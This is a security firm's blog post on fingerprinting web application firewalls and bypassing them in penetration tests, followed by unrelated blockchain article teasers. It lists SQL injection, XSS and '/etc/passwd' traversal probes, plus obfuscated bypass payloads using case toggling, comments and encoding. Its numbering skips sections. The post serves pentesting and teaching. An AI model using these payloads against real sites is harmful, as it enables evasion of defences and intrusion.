Web application firewall (WAF) is a set of monitors and filters designed to detect and block network attacks on a web application. WAFs refer to the application layer of the OSI model.
The web application firewall is used as a security tool. In real time, it decides whether to grant or deny access.
Companies should be informed that WAF is not a full-fledged information protection tool. Usually, it is included in the overall security system of a web application with other elements such as components that solve the problems of protocols other than HTTP / HTTPS, incident control systems, and anti-fraud services.
When conducting penetration testing, we first identify the real IP address, enumerate the WAF vendor, and try to bypass the WAF. After the defense is broken through, the most exciting part begins. Everything the client has wanted to hide behind the WAF provides room for further penetration testing.
How many times have we bypassed such protection? It is shocking that every second site is vulnerable to this bypass method and techniques. Since the WAF vendors are trying to maintain static regexp lists to trigger WAF, hackers find new ways to bypass this protection by masking payloads. There are almost no locks that cannot be broken by a scrap. Therefore, we see an endless game of cat and mouse, hackers against WAFs.
So a summary of reasons for using WAF:
Defense in Depth approach.
Detects and blocks attacks against vulnerable web applications.
SPF and TXT records might have an IP address of a CloudFlare less origin point.
3. Also can check securitytrails.com in field Historical data might have original IP in old records.
How to proof WAF set up correctly:
WAFs use standard ports 80, 443, 8000, 8008, 8080, and 8088 ports.
WAFs set their own cookies in requests.
WAFs associate themselves with separate headers.
WAFs expose themselves in the Server header.
WAFs expose themselves in the response content.
WAFs reply with unique response codes upon malicious requests.
Send a standard GET request from a browser, intercept, and record response headers (specifical cookies).
Send a request from the command line (e.g., cURL), and then check response content and headers.
Send GET requests to random open ports and check banners that might expose the WAFs identity.
Try some SQL injection payloads like: β or 1 = 1 β to login forms or forget a password.
Try with noisy XSS payloads like <script>confirm()</script> in some input fields.
Try to add ../../../etc/passwd to a random parameter in the URL address.
Add some payloads like β OR SLEEP(5) OR β at the end of URLs to any random parameter.
Send GET requests with outdated protocols like HTTP/0.9 (HTTP/0.9 does not support POST type queries).
Check the server header upon different types of interactions.
Send a raw crafted FIN&RST packet to the server and identify a response.
Side-Channel Attacks β Examine the timing behavior of the request and response content.
Most hackers use automated tools to speed up processes to bypass WAFs on resources of their interest. We have compiled a small list of tools that hackers use every day. The use of these tools is just the first step to checking what is open to hackers. Always do a regular penetration test, as WAFs replenish their base every day, in ways they can get around them. But hackers also do not sleep and every day they look for new ways to bypass WAFs.
It is very cool when companies do a penetration test and participate in bug bounty programs, which allow them to attract thousands of white hat hackers to their side, and jointly fix the mistakes made by the developers and WAFs.
Tools to Check and Bypass WAFs:
w3af β Web Application Attack and Audit Framework
wafw00f β Identify and fingerprint Web Application Firewall
BypassWAF β Bypass firewalls by abusing DNS history. This tool will search for old DNS A records and check if the server replies for that domain.
CloudFail β is a tactical reconnaissance tool that tries to find the original IP address behind the Cloudflare WAF.
Techniques to bypass WAF:
1. Case Toggling Technique
Combine upper and lower case characters for creating efficient payloads.
Basic Request:
<script>confirm()</script>
Bypassed Technique:
<ScrIpT>confirm()</sCRiPt>
Basic Request:
SELECT * FROM * WHERE OWNER = 'NAME_OF_DB'
Bypassed Technique:
sELeCt * fRoM * wHerE OWNER = 'NAME_OF_DB'
Example in URL:
http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4
2. URL Encoding Technique
Encode normal payloads with % encoding/URL encoding.
Such rules often tend to filter out a specific type of encoding.
Such filters can be bypassed by mixed encoding payloads.
Newlines and tabs and further add to obfuscation.
Obfuscate Payload:
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
6. Using Comments Technique
Comments obfuscate standard payload vectors.
Different payloads have different ways of obfuscation.
Blocked by WAF:
<script>confirm()</script>
Bypassed Technique:
<!--><script>confirm/**/()/**/</script>
Blocked by WAF:
/?id=1+union+select+1,2--
Bypassed Technique:
/?id=1+un/**/ion+sel/**/ect+1,2--
Insert comments in the middle of attack strings. For instance, /*!SELECT*/ might be overlooked by the WAF but passed on to the target application and processed by a mysql database.
Example in URL:
index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4
'union%a0select pass from users#
Example in URL:
index.php?page_id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
7. Double Encoding Technique
Web Application Firewall filters tend to encode characters to protect web app.
Poorly developed filters (without recursion filters) can be bypassed with double encoding.
Letβs summarize everything written above. Always think outside the box. Try different encoding techniques, and some of them will work. Do not be lazy to check DNS records since itβs the only way to succeed in bug bounty hunting.
Do not forget that any protection can be bypassed in web resources and the WAF is not a panacea for all problems. Hackers do not sleep and always look for new techniques to attack your resources and get profit. Regular penetration testing from Hacken experts, as well as participation in bug bounty programs from HackenProof, will help you avoid many problems. Check more at: https://wp.hacken.io/services/penetrationtesting/
The blockchain industry has been grappling with scalability issues, which have hindered widespread adoption due to its technical constraints. As the demand for blockchain, decentralized applications (dApps), and transactions increases, the limitations of existing networks become increasingly apparent. High transaction fees and network congestion have plagued platforms like Ethereum, hampering their ability to support large-scale
The experimental semi-fungible token standard, ERC-404, combines elements from ERC-20 and ERC-721 tokens. Despite rising popularity, it has yet to secure an official Ethereum Improvement Proposal (EIP) designation. However, its unique attributes, such as enabling fractional ownership of NFTs and enhancing liquidity, coupled with the potential for automated NFT minting and burning processes, suggest a
Decentralized applications (dApps) are software that run on a decentralized network, often using blockchain technology. These applications can serve various purposes for end users, such as brokers, art collectors, traders, investors, and documents of public trust. However, their functionality and value attract malicious groups aiming to exploit vulnerabilities for financial gain. This article explores real-world examples of dApp security breaches, their attack vectors, and the lessons learned.